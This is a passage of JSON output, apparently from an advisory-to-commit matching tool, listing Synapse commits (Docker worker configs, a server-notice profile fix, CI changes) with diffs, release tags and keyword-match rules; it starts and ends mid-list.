"v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server", - "relevance": 4 - } - ] - }, - { - "commit_id": "e6797e004f4383ddbfc215c8ad8a61964d2ef2c6", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1606762769, - "hunks": 2, - "message": "Allow per-room profile to be used for server notice user (#8799) This applies even if the feature is disabled at the server level with `allow_per_room_profiles`. The server notice not being a real user it doesn't have an user profile.", - "diff": [ - "diff --git a/changelog.d/8799.bugfix b/changelog.d/8799.bugfix", - "new file mode 100644", - "index 000000000..a7e6b3556", - "--- /dev/null", - "+++ b/changelog.d/8799.bugfix", - "@@ -0,0 +1 @@", - "+Allow per-room profiles to be used for the server notice user.", - "diff --git a/synapse/handlers/room_member.py b/synapse/handlers/room_member.py", - "index 5a8120db5..6af59b3f7 100644", - "--- a/synapse/handlers/room_member.py", - "+++ b/synapse/handlers/room_member.py", - "@@ -352,3 +352,11 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):", - "- if not self.allow_per_room_profiles or requester.shadow_banned:", - "+ # allow the server notices mxid to set room-level profile", - "+ is_requester_server_notices_user = (", - "+ self._server_notices_mxid is not None", - "+ and requester.user.to_string() == self._server_notices_mxid", - "+ )", - "+", - "+ if (", - "+ not self.allow_per_room_profiles and not is_requester_server_notices_user", - "+ ) or requester.shadow_banned:", - " # Strip profile data, knowing that new profile data will be added to the" - ], - "changed_files": [ - "changelog.d/8799.bugfix", - "synapse/handlers/room_member.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8799": "" - }, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: server, file", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8799", - "relevance": 2 - } - ] - }, - { - "commit_id": "903bb990b953ec3393d30da81693e0e8bdc2d026", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607698058, - "hunks": 1, - "message": "Remove the CI requirement for newsfiles (#73) We don't use newsfiles for DINUM releases anyways, so a CI requirement for them does not make sense.", - "diff": [ - "diff --git a/.buildkite/pipeline.yml b/.buildkite/pipeline.yml", - "index 5877ff088..c3171c00c 100644", - "--- a/.buildkite/pipeline.yml", - "+++ b/.buildkite/pipeline.yml", - "@@ -31,13 +31,2 @@ steps:", - "- - label: \":newspaper: Newsfile\"", - "- command:", - "- - \"python -m pip install tox\"", - "- - \"scripts-dev/check-newsfragment\"", - "- branches: \"!master !develop !release-*\"", - "- plugins:", - "- - docker#v3.0.1:", - "- image: \"python:3.6\"", - "- propagate-environment: true", - "- mount-buildkite-agent: false", - "-", - " - label: \"\\U0001F9F9 check-sample-config\"" - ], - "changed_files": [ - ".buildkite/pipeline.yml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "73": "account_data returned by /_matrix/client/unstable/org.matrix.msc3575/sync are sometimes inconsistent matrix-org/sliding-sync#189" - }, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 73", - "relevance": 2 - } - ] - }, - { - "commit_id": "422d40e82f6b0de224922f057e8f6f83d479291d", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607970898, - "hunks": 8, - "message": "major wip", - "diff": [ - "diff --git a/docker/Dockerfile-workers b/docker/Dockerfile-workers", - "new file mode 100644", - "index 000000000..88b2a5262", - "--- /dev/null", - "+++ b/docker/Dockerfile-workers", - "@@ -0,0 +1,25 @@", - "+# Inherit from the official Synapse docker image", - "+FROM matrixdotorg/synapse", - "+", - "+# Install deps", - "+RUN apt-get update", - "+RUN apt-get install -y supervisor redis nginx", - "+", - "+# A script to read environment variables and create the necessary", - "+# files to run the desired worker configuration", - "+COPY ./docker/create_worker_config_files.py /create_worker_config_files.py", - "+RUN /create_worker_config_files.py", - "+", - "+# Create a volume for logging. The official Synapse docker image", - "+# only logs to console, however this is inconvenient for multi-process", - "+# containers.", - "+VOLUME [\"/logs\"]", - "+", - "+# Expose Synapse client, ACME challenge and federation ports", - "+EXPOSE 8008/tcp 8009/tcp 8448/tcp", - "+", - "+# Start supervisord", - "+COPY ./docker/worker_conf/supervisord.conf /etc/supervisor/conf.d/supervisord.conf", - "+ENTRYPOINT [\"/usr/bin/supervisord\"]", - "+", - "+# TODO: Healthcheck? Can we ask supervisord?", - "\\ No newline at end of file", - "diff --git a/docker/MoveToComplement.Dockerfile b/docker/MoveToComplement.Dockerfile", - "new file mode 100644", - "index 000000000..c91000bc7", - "--- /dev/null", - "+++ b/docker/MoveToComplement.Dockerfile", - "@@ -0,0 +1,35 @@", - "+# This dockerfile builds on top of Dockerfile-worker and includes a built-in postgres instance.", - "+# It is intended to be used for Complement testing", - "+", - "+FROM matrixdotorg/synapse:workers", - "+", - "+# Install postgres", - "+RUN apt-get update", - "+RUN apt-get install -y postgres", - "+", - "+# Create required databases in postgres", - "+", - "+# Create a user without a password", - "+RUN sudo -u postgres createuser -w synapse_user", - "+", - "+# Then set their password", - "+RUN sudo -u postgres psql -c \"ALTER USER postgres PASSWORD 'somesecret';\"", - "+", - "+# Create the synapse database", - "+RUN sudo -u postgres psql -c \"CREATE DATABASE synapse \\", - "+ ENCODING 'UTF8' \\", - "+ LC_COLLATE='C' \\", - "+ LC_CTYPE='C' \\", - "+ template=template0 \\", - "+ OWNER synapse_user;\"", - "+", - "+# Modify Synapse's database config to point to the local postgres", - "+COPY ./docker/synapse_use_local_postgres.py /synapse_use_local_postgres.py", - "+RUN /synapse_use_local_postgres.py", - "+", - "+VOLUME [\"/data\"]", - "+", - "+EXPOSE 8008/tcp 8009/tcp 8448/tcp", - "+", - "+# Start supervisord", - "+CMD [\"/usr/bin/supervisord\"]", - "\\ No newline at end of file", - "diff --git a/docker/conf/homeserver.yaml b/docker/conf/homeserver.yaml", - "index a808485c1..8434fc69f 100644", - "--- a/docker/conf/homeserver.yaml", - "+++ b/docker/conf/homeserver.yaml", - "@@ -29,4 +29,3 @@ listeners:", - " {% if not SYNAPSE_NO_TLS %}", - "- -", - "- port: 8448", - "+ - port: 8448", - " bind_addresses: ['::']", - "@@ -54,2 +53,11 @@ listeners:", - "+ {% if SYNAPSE_WORKERS %}", - "+ # The HTTP replication port", - "+ - port: 9093", - "+ bind_address: '127.0.0.1'", - "+ type: http", - "+ resources:", - "+ - names: [replication]", - "+ {% endif %}", - "+", - " ## Database ##", - "diff --git a/docker/generate_shared_worker_config.py b/docker/generate_shared_worker_config.py", - "new file mode 100644", - "index 000000000..755a73734", - "--- /dev/null", - "+++ b/docker/generate_shared_worker_config.py", - "@@ -0,0 +1,145 @@", - "+#!/usr/bin/env python", - "+# -*- coding: utf-8 -*-", - "+# Copyright 2020 The Matrix.org Foundation C.I.C.", - "+#", - "+# Licensed under the Apache License, Version 2.0 (the \"License\");", - "+# you may not use this file except in compliance with the License.", - "+# You may obtain a copy of the License at", - "+#", - "+# http://www.apache.org/licenses/LICENSE-2.0", - "+#", - "+# Unless required by applicable law or agreed to in writing, software", - "+# distributed under the License is distributed on an \"AS IS\" BASIS,", - "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+# See the License for the specific language governing permissions and", - "+# limitations under the License.", - "+", - "+# This script reads environment variables and generates a shared Synapse worker,", - "+# nginx and supervisord configs depending on the workers requested", - "+", - "+import os", - "+import sys", - "+", - "+", - "+def main(args, environ):", - "+ \"\"\"Read the desired list of workers from environment variables and generate", - "+ shared homeserver, nginx and supervisord configs.", - "+", - "+ Args:", - "+ environ: _Environ[str]", - "+ \"\"\"", - "+ # The contents of this string will be appended to the one generated by", - "+ # the homeserver, and is intended mainly for disabling functionality on the main", - "+ # when certain workers are spun up", - "+ homeserver_config = \"\"", - "+", - "+ # The contents of this string will be append to the base supervisord config", - "+ supervisord_config = \"\"", - "+", - "+ # An nginx site config. Will live in /etc/nginx/conf.d", - "+ nginx_config_template_header = \"\"\"", - "+ server {", - "+ listen 80;", - "+ listen [::]:80;", - "+", - "+ # For the federation port", - "+ listen 8448 default_server;", - "+ listen [::]:8448 default_server;", - "+", - "+ server_name localhost;", - "+ \"\"\"", - "+ nginx_config_body = \"\"", - "+ nginx_config_template_end = \"\"\"", - "+ # Send all other traffic to the main process", - "+ location ~* ^(\\/_matrix|\\/_synapse) {", - "+ proxy_pass http://localhost:8008;", - "+ proxy_set_header X-Forwarded-For $remote_addr;", - "+", - "+ # TODO: Can we move this to the default nginx.conf so all locations are", - "+ # affected?", - "+ #", - "+ # Nginx by default only allows file uploads up to 1M in size", - "+ # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", - "+ client_max_body_size 50M;", - "+ }", - "+ }", - "+ \"\"\"", - "+", - "+ # Read desired worker configuration from environment", - "+ worker_types = environ.get(\"SYNAPSE_WORKERS\")", - "+ worker_types = worker_types.split(\",\")", - "+", - "+ for worker_type in worker_types:", - "+ if worker_type == \"pusher\":", - "+ # Disable push handling from the main process", - "+ homeserver_config += \"\"\"", - "+ start_pushers: false", - "+ \"\"\"", - "+", - "+ # Enable the pusher worker in supervisord", - "+ supervisord_config += \"\"\"", - "+ \"\"\"", - "+", - "+ # This worker does not handle any REST endpoints", - "+", - "+ elif worker_type == \"appservice\":", - "+ # Disable appservice traffic sending from the main process", - "+ homeserver_config += \"\"\"", - "+ notify_appservices: false", - "+ \"\"\"", - "+", - "+ # Enable the pusher worker in supervisord", - "+ supervisord_config += \"\"\"", - "+ [program:synapse_user_dir]", - "+ command=/usr/local/bin/python -m synapse.app.user_dir \\", - "+ --config-path=/config/homeserver.yaml \\", - "+ --config-path=/config/workers/user_dir.yaml", - "+ autorestart=unexpected", - "+ exitcodes=0", - "+ \"\"\"", - "+", - "+ # This worker does not handle any REST endpoints", - "+", - "+ elif worker_type == \"user_dir\":", - "+ # Disable user directory updates on the main process", - "+ homeserver_config += \"\"\"", - "+ update_user_directory: false", - "+ \"\"\"", - "+", - "+ # Enable the user directory worker in supervisord", - "+ supervisord_config += \"\"\"", - "+ [program:synapse_user_dir]", - "+ command=/usr/local/bin/python -m synapse.app.user_dir \\", - "+ --config-path=/config/homeserver.yaml \\", - "+ --config-path=/config/workers/user_dir.yaml", - "+ autorestart=unexpected", - "+ exitcodes=0", - "+ \"\"\"", - "+", - "+ # Route user directory requests to this worker", - "+ nginx_config_body += \"\"\"", - "+ location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", - "+ proxy_pass http://localhost:8010;", - "+ proxy_set_header X-Forwarded-For $remote_addr;", - "+ }", - "+ \"\"\"", - "+", - "+ # Write out the config files", - "+", - "+ # Main homeserver config", - "+ with open(\"/config/main.yaml\", \"a\") as f:", - "+ f.write(homeserver_config)", - "+", - "+ # Nginx config", - "+ with open(\"/config/nginx.conf\", \"w\") as f:", - "+ f.write(nginx_config_template_header)", - "+ f.write(nginx_config_body)", - "+ f.write(nginx_config_template_end)", - "+", - "+ # Supervisord config", - "+ with open(\"/config/supervisord.conf\", \"a\") as f:", - "+ f.write(supervisord_config)", - "+", - "+", - "+if __name__ == \"__main__\":", - "+ main(sys.argv, os.environ)", - "diff --git a/docker/start.py b/docker/start.py", - "index 0d2c590b8..c3a6d9686 100755", - "--- a/docker/start.py", - "+++ b/docker/start.py", - "@@ -179,3 +179,2 @@ def run_generate_config(environ, ownership):", - "-", - " def main(args, environ):", - "diff --git a/docker/worker_conf/main.conf b/docker/worker_conf/main.conf", - "new file mode 100644", - "index 000000000..917b82500", - "--- /dev/null", - "+++ b/docker/worker_conf/main.conf", - "@@ -0,0 +1,9 @@", - "+# A bit of Synapse config file that will be appended to the main homeserver config file.", - "+# It is intended for generate_shared_worker_config.py to add entries to this file to", - "+# disable functionality as equivalent workers are spun up.", - "+", - "+# TODO: extend the existing `listeners` section. This defines the ports that the", - "+# main process will listen on.", - "+", - "+redis:", - "+ enabled: true", - "diff --git a/docker/worker_conf/supervisord.conf b/docker/worker_conf/supervisord.conf", - "new file mode 100644", - "index 000000000..63c898e75", - "--- /dev/null", - "+++ b/docker/worker_conf/supervisord.conf", - "@@ -0,0 +1,19 @@", - "+[supervisord]", - "+nodaemon=true", - "+", - "+[program:nginx]", - "+command=/usr/sbin/nginx -g \"daemon off;\"", - "+priority=900", - "+stdout_logfile= /dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+username=www-data", - "+autorestart=true", - "+", - "+[program:synapse_main]", - "+command=/usr/local/bin/python -m synapse.app.homeserver \\", - "+ --config-path=/config/homeserver.yaml \\", - "+ --config-path=/config/main.yaml", - "+autorestart=unexpected", - "+exitcodes=0" - ], - "changed_files": [ - "docker/Dockerfile-workers", - "docker/MoveToComplement.Dockerfile", - "docker/conf/homeserver.yaml", - "docker/generate_shared_worker_config.py", - "docker/start.py", - "docker/worker_conf/main.conf", - "docker/worker_conf/supervisord.conf" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: homeserver, server, file", - "relevance": 4 - } - ] - }, - { - "commit_id": "35be2600902189392aaa6a212058853e9e39aeba", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608206718, - "hunks": 1, - "message": "Newsfile", - "diff": [ - "diff --git a/changelog.d/8962.bugfix b/changelog.d/8962.bugfix", - "new file mode 100644", - "index 000000000..af1a5e4c3", - "--- /dev/null", - "+++ b/changelog.d/8962.bugfix", - "@@ -0,0 +1 @@", - "+Fix bug where application services couldn't register new ghost users if the server had reached its MAU limit." - ], - "changed_files": [ - "changelog.d/8962.bugfix" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - } - ] - }, - { - "commit_id": "57068eae75162f6cf0e3be05a87de6c22d90b6c7", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607521696, - "hunks": 1, - "message": "Add 'xmlsec1' to dependency list", - "diff": [ - "diff --git a/docker/Dockerfile-dhvirtualenv b/docker/Dockerfile-dhvirtualenv", - "index 619585d5f..2b7f01f7f 100644", - "--- a/docker/Dockerfile-dhvirtualenv", - "+++ b/docker/Dockerfile-dhvirtualenv", - "@@ -71,3 +71,4 @@ RUN apt-get update -qq -o Acquire::Languages=none \\", - " sqlite3 \\", - "- libpq-dev", - "+ libpq-dev \\", - "+ xmlsec1" - ], - "changed_files": [ - "docker/Dockerfile-dhvirtualenv" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: file", - "relevance": 4 - } - ] - }, - { - "commit_id": "9bbbb11ac20896629c25b160fa3cebef29431bfe", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607528919, - "hunks": 5, - "message": "Pin the docker version for multiarch builds It seems that letting CircleCI use its default docker version (17.09.0-ce, apparently) did not interact well with multiarch builds: in particular, we saw weird effects where running an amd64 build at the same time as an arm64 build caused the arm64 builds to fail with: Error while loading /usr/sbin/dpkg-deb: No such file or directory", - "diff": [ - "diff --git a/.circleci/config.yml b/.circleci/config.yml", - "index b10cbedd6..088da5573 100644", - "--- a/.circleci/config.yml", - "+++ b/.circleci/config.yml", - "@@ -7,3 +7,2 @@ jobs:", - " - checkout", - "- - setup_remote_docker", - " - docker_prepare", - "@@ -22,3 +21,2 @@ jobs:", - " - checkout", - "- - setup_remote_docker", - " - docker_prepare", - "@@ -48,3 +46,3 @@ commands:", - " docker_prepare:", - "- description: Downloads the buildx cli plugin and enables multiarch images", - "+ description: Sets up a remote docker server, downloads the buildx cli plugin, and enables multiarch images", - " parameters:", - "@@ -54,2 +52,6 @@ commands:", - " steps:", - "+ - setup_remote_docker:", - "+ # 19.03.13 was the most recent available on circleci at the time of", - "+ # writing.", - "+ version: 19.03.13", - " - run: apk add --no-cache curl", - "diff --git a/changelog.d/8906.misc b/changelog.d/8906.misc", - "new file mode 100644", - "index 000000000..8b95e4c55", - "--- /dev/null", - "+++ b/changelog.d/8906.misc", - "@@ -0,0 +1 @@", - "+Fix multiarch docker image builds." - ], - "changed_files": [ - ".circleci/config.yml", - "changelog.d/8906.misc" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - 